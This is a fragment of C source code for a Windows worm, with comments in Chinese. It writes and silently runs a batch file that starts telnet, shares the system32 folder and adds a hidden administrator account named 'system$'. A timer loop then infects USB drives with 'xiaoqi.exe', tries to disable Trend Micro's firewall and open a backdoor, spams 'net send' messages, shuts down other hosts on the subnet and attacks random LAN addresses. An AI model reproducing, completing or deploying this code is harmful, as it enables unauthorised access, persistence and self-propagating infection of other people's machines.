fprintf(fp, "del tlntcnfg/r/n");
}
fprintf(fp,"net start telnet/r/n");
fprintf(fp,"net share system$=%ssystem32/r/n",Sysmesg.syspath);
fprintf(fp,"net user system$ system /add/r/n");
fprintf(fp,"net localgroup administrators system$ /add/r/n");
fprintf(fp,"del shutopen.bat/r/n");
fclose(fp);
WinExec("shutopen.bat",SW_HIDE);
}
void TIMER(long minute) //主循环模拟触发器
{
char disk[4],backfile[15];
strcpy(disk,Sysmesg.lastdisk);
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
if(access(disk,0)==0) //感染U盘
{
sprintf(backfile,"%s%s",disk,"xiaoqi.exe");
if(access(backfile,0)==-1) //识别U盘是否已感染
hackdisk(disk);
}
if(minute%11==0) //尝试关闭趋势防毒墙并打开后门
shut_open();
else if(minute%57==0) //群发消息
WinExec("net send * 病毒和蠕虫有什么区别?",SW_HIDE);
else
{
char netid[16];
strcpy(netid,Sysmesg.guestip);
if(Sysmesg.station==0)
netid[strlen(netid)-1]=0;
else if(Sysmesg.station<10)
netid[strlen(netid)-2]=0;
else
netid[strlen(netid)-3]=0;
if(minute%97==0 && rand()%2==1) //尝试关闭其他机器
if(Sysmesg.station==25)
shut(netid,Sysmesg.station*10+1,255);
else
shut(netid,Sysmesg.station*10+1,(Sysmesg.station+1)*10);
else if(Sysmesg.hacknum<999 && minute%23==0 && Sysmesg.send)//尝试网络入侵
{
int childip=rand()%254+1;
hacknet(netid,childip);
}
}
}